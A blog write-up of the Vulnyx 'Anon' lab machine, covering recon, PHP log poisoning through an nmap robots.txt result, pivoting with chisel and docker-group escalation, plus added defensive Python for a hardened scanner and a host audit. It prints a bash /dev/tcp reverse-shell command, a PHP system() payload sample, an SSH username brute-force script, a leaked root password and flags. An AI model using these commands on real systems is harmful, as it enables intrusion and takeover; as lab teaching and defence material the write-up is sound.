vulnyx-Anon

Vulnyx-Anon Writeup

This is a medium-difficulty machine.

It is a Linux machine.

Port discovery

┌──(root㉿kali)-[/tmp]
└─# nmap -Pn -n -p- 192.168.56.104
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 02:06 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00098s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:8F:E3:09 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Ports 22 and 80 are open.

Information gathering on the web service first.

web 80

Directory scan

┌──(root㉿kali)-[/tmp]
└─# feroxbuster -u http://192.168.56.104/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,bak

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.104/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, html, bak]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 368l 933w 10701c http://192.168.56.104/index.html
200 GET 25l 127w 10359c http://192.168.56.104/icons/openlogo-75.png
200 GET 368l 933w 10701c http://192.168.56.104/
301 GET 9l 28w 332c http://192.168.56.104/Anonymous-Connections => http://192.168.56.104/Anonymous-Connections/
200 GET 357l 810w 55475c http://192.168.56.104/Anonymous-Connections/anonymous.jpg
200 GET 98l 195w 2426c http://192.168.56.104/Anonymous-Connections/index.php
301 GET 9l 28w 340c http://192.168.56.104/Anonymous-Connections/victims => http://192.168.56.104/Anonymous-Connections/victims/
[##########>---------] - 11m 1672548/3308235 9m found:7 errors:0
[###################>] - 11m 1095480/1102725 1625/s http://192.168.56.104/
[######>-------------] - 6m 350115/1102725 1029/s http://192.168.56.104/Anonymous-Connections/
[####>---------------] - 4m 226540/1102725 892/s http://192.168.56.104/Anonymous-Connections/victims/

http://192.168.56.104/Anonymous-Connections/ exists.

Vulnerability discovery

It asks us to enter an IP? Let's try the loopback address.

The response is nmap output; judging by it, service version detection is being used. The scan results are saved to a log file, ip.log. The directory scan found another directory, victims, so let's try accessing that log file under it.

We can retrieve the scan results. So we can try writing PHP code into the log and then executing it by visiting the log file. Now we need a way to get our content written into the log.

When we start a web server on our side and have the target scan it, we get request records like this.

The robots.txt request comes from the -sC script scan, which fetches the site's anti-crawler rules.

So create a robots.txt and see how we can control the output.

Write some characters following the robots.txt syntax.

After editing it, start the web server and use the page to scan our Kali box.

Note

If you use the default port 8000, it will not be found, because the target's nmap only scans the first 500 ports.

So we set our port to something under 500.

It outputs the Disallow value from robots.txt. So we control that value to get RCE.
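Stated from the defender's side, the root cause is twofold: user input reaches nmap, and untrusted data returned by the scanned host (here the robots.txt Disallow entries) is written verbatim into a log that is served from, and interpreted in, the web root. The following Python is an added example, not the target machine's own code, of how such a scanner wrapper could be written so that neither step is exploitable: the target is parsed as a literal IP address, nmap is invoked with an argv list instead of a shell string, every output line is sanitised, and the log is written outside the web root. LOG_DIR, the nmap flags and the fake_nmap output are assumptions constructed for this demo.

```python
import html
import ipaddress
import re
import subprocess
import tempfile
from pathlib import Path

# Assumed location, outside the web root. The machine in this writeup stored <ip>.log
# under the web-served victims/ directory, which is what made the poisoned log reachable.
LOG_DIR = Path("/var/lib/scanner/logs")


def validate_target(raw: str) -> str:
    """Accept exactly one literal IP address and return it normalised.

    ipaddress.ip_address() rejects hostnames, CIDR ranges, option-like strings and anything
    containing shell metacharacters. The policy check refuses loopback, link-local, multicast
    and unspecified addresses so the scanner cannot be pointed at itself.
    """
    try:
        addr = ipaddress.ip_address(raw.strip())
    except ValueError as exc:
        raise ValueError(f"not a single IP address: {raw!r}") from exc
    if addr.is_loopback or addr.is_link_local or addr.is_multicast or addr.is_unspecified:
        raise ValueError(f"address not allowed by policy: {addr}")
    return str(addr)


def is_accepted(raw: str) -> bool:
    """Convenience wrapper: True if validate_target() accepts the input."""
    try:
        validate_target(raw)
        return True
    except ValueError:
        return False


def build_scan_command(target: str) -> list:
    """argv for nmap as a list (flags are assumed): no shell is involved, so the target is
    always a single argument and can never become extra options or a second command."""
    return ["nmap", "-Pn", "-n", "-sV", target]


NONPRINTABLE = re.compile(r"[^\t\n\x20-\x7e]")


def sanitize_log_line(line: str) -> str:
    """Defence in depth for data that came from the scanned host (banners, robots.txt
    entries, HTTP titles): drop non-printable bytes and HTML-escape the rest, which also
    turns '<?php' into '&lt;?php' so it can never be parsed as a PHP open tag."""
    return html.escape(NONPRINTABLE.sub("", line), quote=True)


def run_scan(raw_target: str, log_dir: Path = LOG_DIR, runner=subprocess.run) -> Path:
    """Validate, scan with an argv list, sanitise every output line and store the log
    outside the web root. The file name is derived only from the validated address, so
    no path traversal is possible. `runner` is injectable so the flow runs without nmap."""
    target = validate_target(raw_target)
    proc = runner(build_scan_command(target), capture_output=True, text=True,
                  timeout=600, check=False)
    lines = [sanitize_log_line(ln) for ln in proc.stdout.splitlines()]
    path = log_dir / (target.replace(":", "_") + ".log")
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text("\n".join(lines) + "\n", encoding="utf-8")
    return path


# Constructed sample of what a scanned host can feed back through -sC/-sV: a robots.txt
# Disallow entry carrying PHP, the same channel the writeup above abuses.
FAKE_NMAP_OUTPUT = (
    "PORT    STATE SERVICE VERSION\n"
    "80/tcp  open  http    SimpleHTTPServer 0.6 (Python 3.11)\n"
    "| http-robots.txt: 1 disallowed entry\n"
    "|_/<?php system($_GET['c']); ?>\n"
)


def fake_nmap(argv, **kwargs) -> subprocess.CompletedProcess:
    """Stand-in for subprocess.run used by demo(); returns the constructed output above."""
    return subprocess.CompletedProcess(argv, 0, stdout=FAKE_NMAP_OUTPUT, stderr="")


def demo() -> str:
    """Run the hardened flow against the fake scanner and return the stored log text."""
    with tempfile.TemporaryDirectory() as tmp:
        return run_scan("10.10.10.20", log_dir=Path(tmp), runner=fake_nmap).read_text(encoding="utf-8")


if __name__ == "__main__":
    for candidate in ("10.10.10.20", "127.0.0.1", "192.168.56.101; id", "-iL /etc/passwd"):
        print(("accepted: " if is_accepted(candidate) else "rejected: ") + candidate)
    print(demo())
```

Even with the sanitiser in place, the decisive control is the last one: a log that lives outside the document root and is served (if at all) as text/plain cannot be executed no matter what the scanned host returns.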

Reverse shell

bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.56.101/1234%200%3E%261%27

We are clearly inside Docker.

Privilege escalation

We are currently a regular user, but we are in the sudo group.

hacktivist@debian1:/var/www/html/Anonymous-Connections/victims$ id
id
uid=1000(hacktivist) gid=1000(hacktivist) groups=1000(hacktivist),27(sudo)
hacktivist@debian1:/var/www/html/Anonymous-Connections/victims$ sudo -l
sudo -l
Matching Defaults entries for hacktivist on debian1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User hacktivist may run the following commands on debian1:
(ALL : ALL) NOPASSWD: ALL

Escalate to root

history

root@debian1:/var/www/html/Anonymous-Connections/victims# history
history
1 echo 'root:$uP3r_$3cUr3_D0ck3r' | chpasswd
2 cd
3 nano .bash_history
4 exit
5 id
6 ip a
7 nmap -Pn -n -p- 172.17.0.2/24
8 nmap -Pn -n -p- 10.10.10.10/24
9 history

We obtain a root password, but it is not for the current Docker container; save it: $uP3r_$3cUr3_D0ck3r

Scan the internal network

root@debian1:/var/www/html/Anonymous-Connections/victims# nmap -Pn -n -p- 10.10.10.10/24
10.10/24 -n -p- 10.10.1
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 06:55 UTC
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.20, 16) => Operation not permitted
Offending packet: TCP 10.10.10.10:50197 > 10.10.10.20:7523 S ttl=51 id=3850 iplen=44 seq=3559377068 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.1, 16) => Operation not permitted
Offending packet: TCP 10.10.10.10:50197 > 10.10.10.1:2952 S ttl=46 id=18601 iplen=44 seq=3559377068 win=1024 <mss 1460>
Nmap scan report for 10.10.10.1
Host is up (0.000011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:42:D4:5D:80:BF (Unknown)

Nmap scan report for 10.10.10.20
Host is up (0.000017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
MAC Address: 02:42:0A:0A:0A:14 (Unknown)

Nmap scan report for 10.10.10.10
Host is up (0.0000080s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http

Nmap done: 256 IP addresses (3 hosts up) scanned in 7.98 seconds

Port forwarding

Port 2222 is open on 10.10.10.20; we need port forwarding.

Upload chisel

kali : chisel server -p 12345 --reverse
target : chisel client kali-ip:kali-port R:port:127.0.0.1:port

Port forwarded successfully.

Try logging in via SSH (with the root password obtained above).

Clearly we are still inside Docker.

root@debian2:~# ls -al
total 28
drwx------ 4 root root 4096 Feb 4 22:01 .
drwxr-xr-x 1 root root 4096 Feb 4 11:17 ..
-rw------- 1 root root 93 Feb 4 23:12 .bash_history
-rw-r--r-- 1 root root 586 Feb 4 20:29 .bashrc
drwxr-xr-x 3 root root 4096 Feb 4 20:21 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 2 root root 4096 Feb 4 21:38 .ssh
root@debian2:~# cd .ssh
root@debian2:~/.ssh# ls
authorized_keys id_rsa
root@debian2:~/.ssh# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
root@debian2:~/.ssh#

We don't know which user this id_rsa belongs to. It looks like it could be the id_rsa of a user on the real host.

Brute-forcing the user

brute user

The script: it's my first time writing one, so it's a bit rough. Not the complete version.


#!/bin/bash
# Colours used by the messages below (undefined in the original, so nothing was coloured)
RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
NC='\033[0m'

brute_user(){

    # the original used ( $# -lt 3 ), which runs "$#" as a command instead of testing it
    if [ "$#" -lt 3 ]; then
        echo -e "${BLUE}Usage:${NC} brute_user <user-dict> <target-ip> <id_rsa_path>"
        exit 1
    fi

    USERS_DICT=$1
    RHOST=$2
    ID_RSA_PATH=$3

    if [ ! -f "$USERS_DICT" ]; then
        echo -e "${RED} $USERS_DICT does not exist! ${NC}"
        exit 1
    fi

    if [ ! -f "$ID_RSA_PATH" ]; then
        echo -e "${RED} $ID_RSA_PATH does not exist! ${NC}"
        exit 1
    fi

    # ssh refuses keys with permissive modes
    chmod 600 "$ID_RSA_PATH"

    # one attempt per name; if `id` runs, the key is authorised for that user
    while read -r user; do
        [ -z "$user" ] && continue
        if timeout 0.5 ssh -i "$ID_RSA_PATH" "$user"@"$RHOST" -x id &>/dev/null; then
            echo -e "${GREEN}[+] User $user is valid ${NC}"
            exit 0
        else
            echo -e "${RED}[-] User $user is invalid${NC}"
        fi
    done < "$USERS_DICT"
}

brute_user "$@"

The idea is to connect over SSH; if `id` runs successfully, the username is correct.

SSH into the real host

┌──(root㉿kali)-[/tmp]
└─# ssh alfredo@192.168.56.104 -i id_rsa
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
alfredo@anon:~$ id
uid=1000(alfredo) gid=1000(alfredo) groups=1000(alfredo),109(docker)
alfredo@anon:~$

The user is in the docker group, so we can escalate directly.
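The three findings on this page that hand over root (the password piped into chpasswd and left in .bash_history under "Privilege escalation", the NOPASSWD: ALL sudo rule from `sudo -l`, and membership in the docker group seen here) are all visible to a routine host audit. The Python below is an added example, not from the original writeup, of detection logic for exactly those three signals. The SAMPLE_* inputs are constructed to mirror the page's output with the password replaced by a placeholder, and the list of root-equivalent groups is an assumption of the example.

```python
import re

# Constructed samples modelled on the page's findings (password replaced by a placeholder).
SAMPLE_HISTORY = [
    "echo 'root:EXAMPLE_PASSWORD' | chpasswd",
    "cd",
    "nano .bash_history",
    "mysql -u app -pEXAMPLE_PASSWORD appdb",
    "nmap -Pn -n -p- 10.10.10.10/24",
    "history",
]
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:hacktivist\ndocker:x:109:alfredo\nlxd:x:110:\n"
SAMPLE_SUDO_L = (
    "User hacktivist may run the following commands on debian1:\n"
    "    (ALL : ALL) NOPASSWD: ALL\n"
)

# Command shapes that leave a secret in shell history (assumed list, extend as needed).
CREDENTIAL_PATTERNS = [
    (re.compile(r"\|\s*chpasswd\b"), "password piped into chpasswd"),
    (re.compile(r"\bsshpass\s+-p\s+\S+"), "sshpass password on the command line"),
    (re.compile(r"\bmysql\b.*\s-p\S+"), "mysql password on the command line"),
    (re.compile(r"\b(?:PASS(?:WORD)?|TOKEN|SECRET)=\S+", re.IGNORECASE),
     "secret assigned in an environment variable"),
]

# Membership in these groups is equivalent to root on the host: docker (bind-mount the host
# filesystem into a container, as the writeup does) and lxd (same idea with LXD containers).
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd"}


def credentials_in_history(lines):
    """Return (line_number, description, line) for each history entry that leaks a secret."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for pattern, description in CREDENTIAL_PATTERNS:
            if pattern.search(line):
                findings.append((number, description, line))
                break
    return findings


def root_equivalent_members(group_text):
    """Parse /etc/group text and map each root-equivalent group to its (non-empty) members."""
    members = {}
    for entry in group_text.splitlines():
        fields = entry.split(":")
        if len(fields) == 4 and fields[0] in ROOT_EQUIVALENT_GROUPS and fields[3]:
            members[fields[0]] = fields[3].split(",")
    return members


NOPASSWD_ALL = re.compile(r"\(\s*ALL\s*(?::\s*ALL)?\s*\)\s*NOPASSWD:\s*ALL\s*$")


def nopasswd_all_rules(sudo_l_text):
    """Return the `sudo -l` rule lines that grant any command as root without a password."""
    return [ln.strip() for ln in sudo_l_text.splitlines() if NOPASSWD_ALL.search(ln.strip())]


def audit(history, group_text, sudo_l_text):
    """Combine the three checks into a list of human-readable findings."""
    findings = []
    for number, description, line in credentials_in_history(history):
        findings.append(f"history line {number}: {description}: {line}")
    for group, users in root_equivalent_members(group_text).items():
        findings.append(f"group {group} (root-equivalent) has members: {', '.join(users)}")
    for rule in nopasswd_all_rules(sudo_l_text):
        findings.append(f"sudo rule grants passwordless root: {rule}")
    return findings


if __name__ == "__main__":
    # On a real host, feed it the contents of ~/.bash_history, /etc/group and `sudo -l`.
    for finding in audit(SAMPLE_HISTORY, SAMPLE_GROUP, SAMPLE_SUDO_L):
        print("[!]", finding)
```

Each of the three functions maps to a concrete fix: rotate and remove any credential found in history (and set HISTCONTROL or use `passwd` interactively), restrict or remove NOPASSWD: ALL, and treat docker group membership as a root grant that needs the same approval as sudo.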

alfredo@anon:~$ docker run -v /:/mnt/ --rm -it debian chroot /mnt bash
root@4fa9df644703:/# id
uid=0(root) gid=0(root) groups=0(root)
root@4fa9df644703:/# cat /root/root.txt
f3a421bdd1e5119f49c3fda29838cf79
root@4fa9df644703:/# cat /home/alfredo/user.txt
af13f20ce2fb4266b4d381cf8f60f85f
root@4fa9df644703:/#

vulnyx-Anon
https://r3bir7hcx.github.io/2025/04/24/vulnyx-Anon/
Author: CXCX
Posted on: April 24, 2025